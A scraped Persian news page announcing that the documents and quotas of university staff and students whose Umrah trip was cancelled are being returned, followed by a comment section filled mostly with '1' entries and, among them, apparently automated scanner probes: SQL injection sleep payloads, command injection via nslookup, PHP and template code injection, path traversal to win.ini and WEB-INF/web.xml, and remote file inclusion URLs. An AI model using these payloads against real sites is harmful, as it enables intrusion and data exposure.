دات نت نیوک
X
سامانه های سازمانی
Saturday 23 January 2021  |   | Login

عودت مدارك دانشگاهيان جامانده از عمره به دانشگاه‌ها

عودت مدارك دانشگاهيان جامانده از عمره به دانشگاه‌ها
به گزارش پايگاه اطلاع رساني حج، ستاد عمره دانشگاهيان با انتشار اطلاعيه اي اعلام كرد كه مدارك دانشگاهيان جامانده از عمره را به دانشگاه‌ها عودت داده و سهميه زايراني كه مقرر بود در سال ۹۴ به عمره اعزام شوند و سفر ايشان لغو شد، براي دوره بعدي محفوظ است.

در اين اطلاعيه آمده است؛

۱- زايراني كه مقرر بود در سال ۹۴ به عمره اعزام شوند و سفر ايشان لغو شد، سهميه ايشان براي دوره بعدي محفوظ است.

۲- زمان اعزام زايران جامانده در صورت راه اندازي مجدد عمره، براي دوره بعدي محفوظ خواهد بود. در صورت تمايل به اعزام مي‌بايست آخرين اخبار درباره اعزام را از طريق سايت لبيك پيگيري شود.

۳- در صورت تمايل به اعزام در سال آتي مي‌بايست حتما ثبت نام اوليه توسط فرد صورت گيرد، ثبت نام اوليه حدوداً مهر ماه انجام خواهد شد. عدم ثبت نام اوليه زايران به منزله عدم تمايل به اعزام و انصراف است. لازم به ذكر است سهميه بدون قرعه كشي خواهد بود.

۴- هزينه سفر كه از حساب زايران برداشت شده بود، به حساب افراد عودت داده شده است و براي اعزام در سال آينده و واريز مبلغ عمره اطلاع رساني خواهد شد. واريز هزينه براي اعزام سال بعد، حدوداً آبان۹۴ خواهد بود.

توجه: دانشجويان در صورت برداشت از حساب؛ از بستن حساب (خالي كردن تمام موجودي) خودداري كنند.

۵- افرادي كه از وام استفاده كرده بودند مي‌توانند اقساط وام را پرداخت كنند، ولي امكان دريافت مجدد وام در سال بعد را نخواهند داشت.

۶- مدارك (از جمله گذرنامه) كليه زايران تا ۱۵ارديبهشت۹۴ به دانشگاه محل تحصيل و يا تدريس افراد عودت داده مي‌شود. لطفا براي دريافت مدارك حداكثر تا ۳۰ ارديبهشت اقدام شود.

توجه: پس گرفتن مدارك از دانشگاه الزامي بوده و افرادي كه براي دريافت مدارك اقدام نكنند، مسئوليت گم شدن مدارك و از دست دادن سهميه سال آينده با خود شخص خواهد بود.

تذكر: براي اعزام دوره بعدي با فراخوان ستاد عمره مي‌بايست مجددا مدارك با كارت ثبت نام جديد به دانشگاه‌ها تحويل شود. زمان دقيق آن متعاقبا اعلام مي‌گردد.
مدیر سایت امتیاز به خبر :

ارسال نظرات

Name (required)

Email (required)

Website

نظرات شما

aujkdryf
aujkdryf Monday, March 30, 2020 16:39
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 16:59
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 17:00
1
aujkdryf
aujkdryf Monday, March 30, 2020 17:12
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 18:03
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 18:04
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 18:07
1
aujkdryf
aujkdryf Monday, March 30, 2020 18:32
1
aujkdryf
aujkdryf Monday, March 30, 2020 18:33
1
aujkdryf
aujkdryf Monday, March 30, 2020 18:36
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 20:15
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 20:16
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 20:21
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 20:23
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 20:26
1
ftlblymn
ftlblymn Monday, March 30, 2020 20:27
1
opvrkqvi
opvrkqvi Monday, March 30, 2020 20:29
1
aujkdryf
aujkdryf Monday, March 30, 2020 21:18
1
aujkdryf
aujkdryf Monday, March 30, 2020 21:19
1
aujkdryf
aujkdryf Monday, March 30, 2020 21:20
1
aujkdryf
aujkdryf Monday, March 30, 2020 21:21
1
opvrkqvi
opvrkqvi Tuesday, March 31, 2020 00:43
1
opvrkqvi
opvrkqvi Tuesday, March 31, 2020 00:44
1
opvrkqvi
opvrkqvi Tuesday, March 31, 2020 00:45
1
opvrkqvi
opvrkqvi Tuesday, March 31, 2020 00:47
1
opvrkqvi
opvrkqvi Tuesday, March 31, 2020 01:03
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:04
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:06
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:08
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:46
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:47
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:48
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:49
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:50
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:51
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:53
1
aujkdryf
aujkdryf Tuesday, March 31, 2020 02:57
1
opvrkqvi
opvrkqvi Sunday, April 05, 2020 22:58
$(nslookup XaAHe2iA)
opvrkqvi
opvrkqvi Sunday, April 05, 2020 22:58
1
opvrkqvi
opvrkqvi Sunday, April 05, 2020 22:58
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
opvrkqvi
opvrkqvi Sunday, April 05, 2020 23:42
1
opvrkqvi
opvrkqvi Sunday, April 05, 2020 23:43
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 00:48
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 00:48
PbVMIa71'));select pg_sleep(7); --
opvrkqvi
opvrkqvi Monday, April 06, 2020 00:48
';print(md5(acunetix_wvs_security_test));$a='
aujkdryf
aujkdryf Monday, April 06, 2020 03:14
1
aujkdryf
aujkdryf Monday, April 06, 2020 03:36
1
aujkdryf
aujkdryf Monday, April 06, 2020 03:36
Http://testasp.vulnweb.com/t/fit.txt
aujkdryf
aujkdryf Monday, April 06, 2020 03:44
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:28
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:29
testasp.vulnweb.com
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:29
http://testasp.vulnweb.com/t/xss.html?%00.jpg
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:30
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:42
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:48
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:49
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:49
@@uT41Q
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:49
@@kvF9g
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:49
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:49
@@wcQZe
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:49
'"()&%
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:49
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 06:56
1
opvrkqvi
opvrkqvi Monday, April 06, 2020 07:00
1
opvrkqvi
opvrkqvi Tuesday, April 07, 2020 01:35
1
opvrkqvi
opvrkqvi Tuesday, April 07, 2020 01:35
WEB-INF/web.xml
opvrkqvi
opvrkqvi Tuesday, April 07, 2020 01:35
;print(md5(acunetix_wvs_security_test));
opvrkqvi
opvrkqvi Tuesday, April 07, 2020 01:35
�'�"
opvrkqvi
opvrkqvi Tuesday, April 07, 2020 01:40
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:31
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:33
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:36
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:37
${@print(md5(acunetix_wvs_security_test))}
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:42
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:48
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:49
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:54
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:54
../../../../../../../../../../windows/win.ini
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:54
/www.vulnweb.com
aujkdryf
aujkdryf Tuesday, April 07, 2020 04:55
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:00
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:00
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:00
";print(md5(acunetix_wvs_security_test));$a="
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:05
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:05
-1)); waitfor delay '0:0:24' --
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:05
http://testasp.vulnweb.com/t/xss.html?%00.jpg
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:06
'"
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:06
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:08
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:10
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:11
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:12
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:16
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:16
${9999770+9999247}
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:30
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:30
(select convert(int,CHAR(65)))
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:34
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:35
JyI=
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:36
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:39
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:39
if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysdate(),sleep(8),0))OR'"XOR(if(now()=sysdate(),sleep(8),0))OR"*/
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:40
(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:41
1
aujkdryf
aujkdryf Tuesday, April 07, 2020 05:49
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 16:30
1
pywotrdk
pywotrdk Tuesday, April 07, 2020 16:32
1
pywotrdk
pywotrdk Tuesday, April 07, 2020 16:34
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 17:08
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 17:10
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 17:25
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 17:26
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 18:48
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 18:53
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 18:55
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 19:24
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 19:25
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 19:26
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 22:29
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 22:30
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 22:33
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 22:38
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 22:42
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 22:43
1
mqmrtvhd
mqmrtvhd Tuesday, April 07, 2020 22:44
1
olheicdc
olheicdc Tuesday, April 07, 2020 22:46
1
olheicdc
olheicdc Tuesday, April 07, 2020 22:51
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 23:47
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 23:48
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 23:49
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 23:50
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 23:51
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 23:52
1
vlsyenta
vlsyenta Tuesday, April 07, 2020 23:56
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 05:07
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:07
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:09
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:11
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:13
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:14
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:16
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:17
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:18
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:19
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:26
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:28
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:32
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:34
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 06:35
1
qbigsegb
qbigsegb Wednesday, April 08, 2020 07:50
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 08:42
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 08:43
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 08:44
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 08:45
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 08:46
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 08:47
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 08:48
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 09:07
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 09:10
1
mqmrtvhd
mqmrtvhd Wednesday, April 08, 2020 09:19
1
vlsyenta
vlsyenta Wednesday, April 08, 2020 09:22
1
qbigsegb
qbigsegb Wednesday, April 08, 2020 09:25
1